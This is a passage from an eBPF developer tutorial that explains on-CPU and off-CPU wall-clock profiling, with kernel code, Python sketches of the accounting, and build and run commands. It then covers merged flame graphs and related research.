        &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_NOEXIST&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;i_keyp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s64&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;start_ts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;min_block_ns&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;max_block_ns&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;/=&lt;/span&gt; &lt;span class="mi"&gt;1000U&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* nanoseconds to microseconds */&lt;/span&gt;
    &lt;span class="n"&gt;valp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__sync_fetch_and_add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;delta&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp_btf/sched_switch"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sched_switch&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;preempt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;handle_sched_switch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;preempt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The off-CPU profiler is more complex because it needs to track timing across multiple events. The &lt;code&gt;start&lt;/code&gt; map stores timestamps and stack information for threads that go off-CPU. When a thread blocks, we record when it happened and why (the stack trace). When that same thread returns to running, we calculate how long it was blocked.&lt;/p&gt;

&lt;p&gt;The scheduler switch happens many times per second on a busy system, so performance matters. The &lt;code&gt;allow_record()&lt;/code&gt; function quickly filters out threads we don't care about before doing expensive operations. If a thread passes the filter, the program captures the current timestamp using &lt;code&gt;bpf_ktime_get_ns()&lt;/code&gt; and records the stack traces showing where the thread blocked.&lt;/p&gt;

&lt;p&gt;The key insight is the two-stage approach. The &lt;code&gt;prev&lt;/code&gt; task (the thread going off-CPU) gets its blocking point recorded with a timestamp. When the scheduler later switches to a &lt;code&gt;next&lt;/code&gt; task (a thread being scheduled back onto a CPU), we look up whether we previously recorded this thread going off-CPU. If we find a record, we calculate the delta between now and when it left the CPU. This delta is the off-CPU time in nanoseconds. Deltas outside the &lt;code&gt;min_block_ns&lt;/code&gt; to &lt;code&gt;max_block_ns&lt;/code&gt; range are discarded; the rest are converted to microseconds and added to the accumulated total for that stack trace.&lt;/p&gt;
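
&lt;p&gt;To make the two stages concrete, here is a minimal user-space model of the same bookkeeping in Python. It is only a sketch, not the eBPF program: the dictionaries stand in for the &lt;code&gt;start&lt;/code&gt; and &lt;code&gt;info&lt;/code&gt; maps, and the function name, the thread IDs, the stack IDs, and the filter bounds are all hypothetical values chosen for illustration.&lt;/p&gt;

```python
# Toy model of the two-stage off-CPU accounting; not the real eBPF code.
MIN_BLOCK_NS = 1_000      # hypothetical lower bound for the filter
MAX_BLOCK_NS = 10**12     # hypothetical upper bound for the filter

start = {}   # tid -> (timestamp_ns, stack_id) for threads currently off-CPU
info = {}    # stack_id -> accumulated off-CPU time in microseconds


def on_sched_switch(now_ns, prev_tid, prev_stack_id, next_tid):
    # Stage 1: the thread leaving the CPU gets a timestamp and its stack.
    start[prev_tid] = (now_ns, prev_stack_id)

    # Stage 2: the thread coming back on-CPU closes its earlier record.
    record = start.pop(next_tid, None)
    if record is None:
        return  # we never saw this thread go off-CPU
    began_ns, stack_id = record
    delta_ns = now_ns - began_ns
    # Clamping leaves delta_ns unchanged only when it is inside the window.
    if delta_ns != min(max(delta_ns, MIN_BLOCK_NS), MAX_BLOCK_NS):
        return
    # Convert nanoseconds to microseconds and accumulate per stack.
    info[stack_id] = info.get(stack_id, 0) + delta_ns // 1000


# Thread 101 leaves the CPU at t=1ms and returns at t=3.5ms.
on_sched_switch(1_000_000, prev_tid=101, prev_stack_id=7, next_tid=202)
on_sched_switch(3_500_000, prev_tid=202, prev_stack_id=9, next_tid=101)
print(info)  # {7: 2500}
```

&lt;p&gt;Thread 101 was away for 2,500,000 ns, so stack 7 accumulates 2,500 microseconds. Thread 202 stays in &lt;code&gt;start&lt;/code&gt; until it is scheduled again.&lt;/p&gt;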

&lt;h3&gt;
  
  
  User-Space Programs: Loading and Processing
&lt;/h3&gt;

&lt;p&gt;Both tools follow a similar pattern in user space. They use libbpf to load the compiled eBPF object file and attach it to the appropriate event. For &lt;code&gt;oncputime&lt;/code&gt;, this means setting up perf events at the desired sampling frequency. For &lt;code&gt;offcputime&lt;/code&gt;, it means attaching to the scheduler tracepoint. The user space programs then periodically read the BPF maps, resolve the stack IDs to actual function names using symbol tables, and format the output.&lt;/p&gt;

&lt;p&gt;The symbol resolution is handled by the blazesym library, which parses DWARF debug information from binaries. When you see a stack trace with function names and line numbers, that's blazesym converting raw instruction pointer addresses into human-readable form. The user space programs output in "folded" format, where each line contains a semicolon-separated stack trace followed by a count or time value. This format feeds directly into flame graph generation tools.&lt;/p&gt;
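
&lt;p&gt;As a rough illustration of the folded format, the following Python sketch parses a few lines into a dictionary keyed by stack. The function name &lt;code&gt;parse_folded&lt;/code&gt; and the sample frames are assumptions made for this example; they are not taken from the tutorial's tools.&lt;/p&gt;

```python
def parse_folded(text):
    """Parse folded stacks into {tuple_of_frames: summed_value}."""
    stacks = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        # The value is the last space-separated field, because frame
        # names themselves may contain spaces.
        stack, _, value = line.rpartition(" ")
        frames = tuple(stack.split(";"))
        stacks[frames] = stacks.get(frames, 0) + int(value)
    return stacks


# Hypothetical sample: two on-CPU style lines and one off-CPU style line.
sample = """
main;cpu_work;compute 42
main;blocking_work;nanosleep 1500000
main;cpu_work;compute 8
"""

folded = parse_folded(sample)
for frames, value in folded.items():
    print(" / ".join(frames), value)
```

&lt;p&gt;Identical stacks are summed, which is the same aggregation a flame graph tool performs before drawing box widths.&lt;/p&gt;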

&lt;h2&gt;
  
  
  Combining On-CPU and Off-CPU Profiles
&lt;/h2&gt;

&lt;p&gt;The real power comes from running both tools together and merging their results. The &lt;code&gt;wallclock_profiler.py&lt;/code&gt; script orchestrates this process. It launches both profilers simultaneously on the target process, waits for them to complete, and then combines their outputs.&lt;/p&gt;

&lt;p&gt;The challenge is that the two tools measure different things in different units. The on-CPU profiler counts samples (49 per second by default), while the off-CPU profiler measures microseconds. To create a unified view, the script normalizes the off-CPU time to equivalent sample counts. If sampling at 49 Hz, each sample represents about 20,408 microseconds of potential execution time. The script divides off-CPU microseconds by this value to get equivalent samples.&lt;/p&gt;
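
&lt;p&gt;The arithmetic behind this normalization can be sketched in a few lines of Python. The helper names are hypothetical, and whether the real script rounds or truncates the result is not shown here, so the conversion is left as a float.&lt;/p&gt;

```python
def us_per_sample(freq_hz):
    # At freq_hz samples per second, one sample stands for this many microseconds.
    return 1_000_000 / freq_hz


def offcpu_us_to_samples(offcpu_us, freq_hz=49):
    # Express blocked time in the same unit as the on-CPU sample counts.
    return offcpu_us / us_per_sample(freq_hz)


print(round(us_per_sample(49)))                    # 20408
print(round(offcpu_us_to_samples(1_000_000), 3))   # 49.0
```

&lt;p&gt;One second of blocking at 49 Hz maps to 49 equivalent samples, the same weight a fully busy thread would get from one second of on-CPU sampling.&lt;/p&gt;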

&lt;p&gt;After normalization, the script adds annotations to distinguish the two types of time. On-CPU stack traces get a &lt;code&gt;_[c]&lt;/code&gt; suffix (for compute), while off-CPU stacks get &lt;code&gt;_[o]&lt;/code&gt; (for off-CPU or blocking). A custom color palette in the flame graph tool renders the two in different colors: red for on-CPU time and blue for blocking time. The result is a single flame graph where you can see both types of activity and their relative magnitudes.&lt;/p&gt;
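
&lt;p&gt;A minimal sketch of the annotate-and-merge step might look like the Python below. It assumes the suffix is appended to the end of each folded stack string and that off-CPU values are rounded to whole samples; both details, along with the function name &lt;code&gt;merge_profiles&lt;/code&gt; and the sample stacks, are assumptions for illustration and not a copy of &lt;code&gt;wallclock_profiler.py&lt;/code&gt;.&lt;/p&gt;

```python
def merge_profiles(oncpu_samples, offcpu_us, freq_hz=49):
    """Combine both profiles into one {annotated_stack: samples} dict."""
    merged = {}
    # On-CPU values are already sample counts; only the tag is added.
    for stack, samples in oncpu_samples.items():
        merged[stack + "_[c]"] = samples
    # Off-CPU values are microseconds; convert to equivalent samples.
    us_per_sample = 1_000_000 / freq_hz
    for stack, micros in offcpu_us.items():
        merged[stack + "_[o]"] = round(micros / us_per_sample)
    return merged


# Hypothetical inputs: 2 s of CPU work and 2 s of blocking at 49 Hz.
oncpu = {"main;cpu_work": 98}
offcpu = {"main;blocking_work": 2_000_000}

merged = merge_profiles(oncpu, offcpu)
for stack, value in merged.items():
    print(f"{stack} {value}")
```

&lt;p&gt;Both stacks end up with a value of 98, so they would be drawn at equal width. Note that with plain rounding, blocks much shorter than one sample period round down to zero.&lt;/p&gt;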

&lt;p&gt;The script also handles multi-threaded applications by profiling each thread separately. It detects threads at startup, launches parallel profiling sessions for each one, and generates individual flame graphs showing per-thread behavior. This helps identify which threads are busy versus idle, and whether your parallelism is effective.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Building the tools requires a standard eBPF development environment. The tutorial repository includes all dependencies in the &lt;code&gt;src/third_party/&lt;/code&gt; directory. To build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;src/32-wallclock-profiler
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the eBPF C code with clang, generates skeletons with bpftool, builds the blazesym symbol resolver, and links everything with libbpf to create the final executables.&lt;/p&gt;

&lt;p&gt;To use the individual tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Profile on-CPU execution for 30 seconds&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./oncputime &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-F&lt;/span&gt; 99 30

&lt;span class="c"&gt;# Profile off-CPU blocking for 30 seconds&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./offcputime &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-m&lt;/span&gt; 1000 30

&lt;span class="c"&gt;# Use the combined profiler (recommended)&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;python3 wallclock_profiler.py &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-d&lt;/span&gt; 30 &lt;span class="nt"&gt;-f&lt;/span&gt; 99
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's try profiling a test program that does both CPU work and blocking I/O:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build and run the test program&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
make
./test_combined &amp;amp;
&lt;span class="nv"&gt;TEST_PID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$!&lt;/span&gt;

&lt;span class="c"&gt;# Profile it with the combined profiler&lt;/span&gt;
&lt;span class="nb"&gt;cd&lt;/span&gt; ..
&lt;span class="nb"&gt;sudo &lt;/span&gt;python3 wallclock_profiler.py &lt;span class="nv"&gt;$TEST_PID&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; 30

&lt;span class="c"&gt;# This generates:&lt;/span&gt;
&lt;span class="c"&gt;# - combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;.folded (raw data)&lt;/span&gt;
&lt;span class="c"&gt;# - combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;.svg (flame graph)&lt;/span&gt;
&lt;span class="c"&gt;# - combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;_single_thread_analysis.txt (time breakdown)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output flame graph will show red frames for the &lt;code&gt;cpu_work()&lt;/code&gt; function consuming CPU time, and blue frames for the &lt;code&gt;blocking_work()&lt;/code&gt; function spending time in sleep. The relative widths show how much wall clock time each consumes.&lt;/p&gt;

&lt;p&gt;For multi-threaded applications, the profiler creates a directory with per-thread results:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Profile a multi-threaded application&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;python3 wallclock_profiler.py &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-d&lt;/span&gt; 30

&lt;span class="c"&gt;# Output in multithread_combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;/&lt;/span&gt;
&lt;span class="c"&gt;# - thread_&amp;lt;TID&amp;gt;_main.svg (main thread flame graph)&lt;/span&gt;
&lt;span class="c"&gt;# - thread_&amp;lt;TID&amp;gt;_&amp;lt;role&amp;gt;.svg (worker thread flame graphs)&lt;/span&gt;
&lt;span class="c"&gt;# - *_thread_analysis.txt (time analysis for all threads)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The analysis files show time accounting, letting you verify that on-CPU plus off-CPU time adds up correctly to the wall clock profiling duration. Coverage percentages help identify if threads are mostly idle or if you're missing data.&lt;/p&gt;
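
&lt;p&gt;The time accounting can be approximated with a small calculation like the one below. This is a sketch of the idea only: the function name, the dictionary keys, and the sample numbers are hypothetical, and the actual layout of the analysis files may differ.&lt;/p&gt;

```python
def time_accounting(oncpu_samples, offcpu_us, freq_hz, duration_s):
    """Estimate how much of the profiling window the two profiles cover."""
    oncpu_s = oncpu_samples / freq_hz      # each sample stands for 1/freq_hz seconds
    offcpu_s = offcpu_us / 1_000_000       # microseconds to seconds
    covered_s = oncpu_s + offcpu_s
    return {
        "oncpu_s": oncpu_s,
        "offcpu_s": offcpu_s,
        "coverage_pct": 100 * covered_s / duration_s,
    }


# Hypothetical thread: 490 samples at 49 Hz plus 18.5 s blocked, over 30 s.
report = time_accounting(490, 18_500_000, freq_hz=49, duration_s=30)
print(report)
```

&lt;p&gt;Here the thread is accounted for during 28.5 of 30 seconds, or 95% coverage. A much lower figure would suggest filtered-out short blocks, missed samples, or a thread that did not exist for the whole window.&lt;/p&gt;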

&lt;h2&gt;
  
  
  Interpreting the Results
&lt;/h2&gt;

&lt;p&gt;When you open the flame graph SVG in a browser, each horizontal box represents a function in a stack trace. The width shows how much time was spent there. Boxes stacked vertically show the call chain, with lower boxes calling higher ones. Red boxes indicate on-CPU time; blue boxes show off-CPU time.&lt;/p&gt;

&lt;p&gt;Look for wide red sections to find CPU bottlenecks. These are functions burning through cycles in tight loops or expensive algorithms. Wide blue sections indicate blocking operations. Common patterns include file I/O (read/write system calls), network operations (recv/send), and lock contention (futex calls).&lt;/p&gt;

&lt;p&gt;The flame graph is interactive. Click any box to zoom in and see details about that subtree. The search function lets you highlight all frames matching a pattern, useful for finding specific functions or libraries. Hovering shows the full function name and exact sample count or time value.&lt;/p&gt;

&lt;p&gt;Pay attention to the relative proportions. An application that's 90% blue is I/O bound and probably won't benefit much from CPU optimization. One that's mostly red is CPU bound. Applications split evenly between red and blue might benefit from overlapping computation and I/O, such as using asynchronous I/O or threading.&lt;/p&gt;

&lt;p&gt;For multi-threaded profiles, compare the per-thread flame graphs. Ideally, worker threads should show similar patterns if the workload is balanced. If one thread is mostly red while others are mostly blue, you might have load imbalance. If all threads show lots of blue time in futex waits with similar stacks, that's lock contention.&lt;/p&gt;

&lt;h2&gt;
  
  
  Related Work and Further Reading
&lt;/h2&gt;

&lt;p&gt;Wall-clock profiling builds on decades of research in performance analysis that distinguishes on-CPU computation from off-CPU waiting. Curtsinger and Berger's Coz (SOSP'15) introduced causal profiling, which experimentally determines which code regions, if optimized, actually reduce end-to-end latency, addressing the fundamental question of where optimization effort pays off. Zhou et al.'s wPerf (OSDI'18) presented a generic off-CPU analysis framework that identifies critical waiting events (locks, I/O) bounding throughput with low overhead, while the more recent work by Ahn et al. (OSDI'24) unified on- and off-CPU analysis through blocked-sample profiling that captures both running and blocked thread states. The visualization techniques we employ draw from Gregg's flame graph methodology (CACM'16, USENIX ATC'17), which transforms stack-trace aggregations into intuitive hierarchical diagrams; his off-CPU flame graphs specifically highlight blocking patterns by rendering sleep stacks in contrasting colors. Timing accuracy itself poses challenges, as Najafi et al. (HotOS'21) argue that modern systems research increasingly depends on precise wall-clock measurements, and earlier work on time-sensitive Linux (Goel et al., OSDI'02) explored kernel techniques for low-latency timing under load. Practical eBPF-based profiling has been demonstrated in production contexts, including Java profiling with off-CPU "offwaketime" analysis (ICPE'19) and comprehensive workflows outlined in recent eBPF performance tutorials (Gregg, SIGCOMM'24). Together, these techniques and tools provide the foundation for understanding where applications spend time and how to optimize holistically across both compute and blocking dimensions.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;Wall clock profiling with eBPF gives you broad visibility into application performance by combining on-CPU and off-CPU analysis. The on-CPU profiler samples execution to find hot code paths that consume CPU cycles. The off-CPU profiler hooks into the scheduler to measure blocking time and identify I/O bottlenecks or lock contention. Together, they account for nearly all of the wall clock time (up to sampling granularity and the blocking-time filter), showing where your application actually spends its life.&lt;/p&gt;

&lt;p&gt;The tools use eBPF's low-overhead instrumentation to collect this data with minimal impact on the target application. Stack trace capture and aggregation happen in the kernel, so no per-event data has to be copied to user space. The user space programs only need to periodically read accumulated results and resolve symbols, which keeps the overhead low enough for many production workloads.&lt;/p&gt;

&lt;p&gt;By visualizing both types of time in a single flame graph with color coding, you can quickly identify whether problems are computational or blocking in nature. This guides optimization efforts more effectively than traditional profiling approaches that only show one side of the picture. Multi-threaded profiling support reveals parallelism issues and thread-level bottlenecks.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;BCC libbpf-tools offcputime: &lt;a href="https://github.com/iovisor/bcc/tree/master/libbpf-tools" rel="noopener noreferrer"&gt;https://github.com/iovisor/bcc/tree/master/libbpf-tools&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;BCC libbpf-tools profile: &lt;a href="https://github.com/iovisor/bcc/tree/master/libbpf-tools" rel="noopener noreferrer"&gt;https://github.com/iovisor/bcc/tree/master/libbpf-tools&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Blazesym symbol resolution: &lt;a href="https://github.com/libbpf/blazesym" rel="noopener noreferrer"&gt;https://github.com/libbpf/blazesym&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;FlameGraph visualization: &lt;a href="https://github.com/brendangregg/FlameGraph" rel="noopener noreferrer"&gt;https://github.com/brendangregg/FlameGraph&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;"Off-CPU Analysis" by Brendan Gregg: &lt;a href="http://www.brendangregg.com/offcpuanalysis.html" rel="noopener noreferrer"&gt;http://www.brendangregg.com/offcpuanalysis.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Coz: Finding Code that Counts with Causal Profiling (SOSP'15): &lt;a href="https://dl.acm.org/doi/10.1145/2815400.2815409" rel="noopener noreferrer"&gt;https://dl.acm.org/doi/10.1145/2815400.2815409&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;wPerf: Generic Off-CPU Analysis (OSDI'18): &lt;a href="https://www.usenix.org/system/files/osdi18-zhou.pdf" rel="noopener noreferrer"&gt;https://www.usenix.org/system/files/osdi18-zhou.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Identifying On-/Off-CPU Bottlenecks with Blocked Samples (OSDI'24): &lt;a href="https://www.usenix.org/system/files/osdi24-ahn.pdf" rel="noopener noreferrer"&gt;https://www.usenix.org/system/files/osdi24-ahn.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;The Flame Graph (CACM'16): &lt;a href="https://queue.acm.org/detail.cfm?id=2927301" rel="noopener noreferrer"&gt;https://queue.acm.org/detail.cfm?id=2927301&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Systems Research is Running out of Time (HotOS'21): &lt;a href="https://sigops.org/s/conferences/hotos/2021/papers/hotos21-s04-najafi.pdf" rel="noopener noreferrer"&gt;https://sigops.org/s/conferences/hotos/2021/papers/hotos21-s04-najafi.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Time-Sensitive Linux (OSDI'02): &lt;a href="https://www.usenix.org/legacy/event/osdi02/tech/full_papers/goel/goel.pdf" rel="noopener noreferrer"&gt;https://www.usenix.org/legacy/event/osdi02/tech/full_papers/goel/goel.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Profiling and Tracing Support for Java Applications (ICPE'19): &lt;a href="https://research.spec.org/icpe_proceedings/2019/proceedings/p119.pdf" rel="noopener noreferrer"&gt;https://research.spec.org/icpe_proceedings/2019/proceedings/p119.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;eBPF Performance Analysis (SIGCOMM'24): &lt;a href="https://www.brendangregg.com/Slides/SIGCOMM2024_eBPF_Performance.pdf" rel="noopener noreferrer"&gt;https://www.brendangregg.com/Slides/SIGCOMM2024_eBPF_Performance.pdf&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
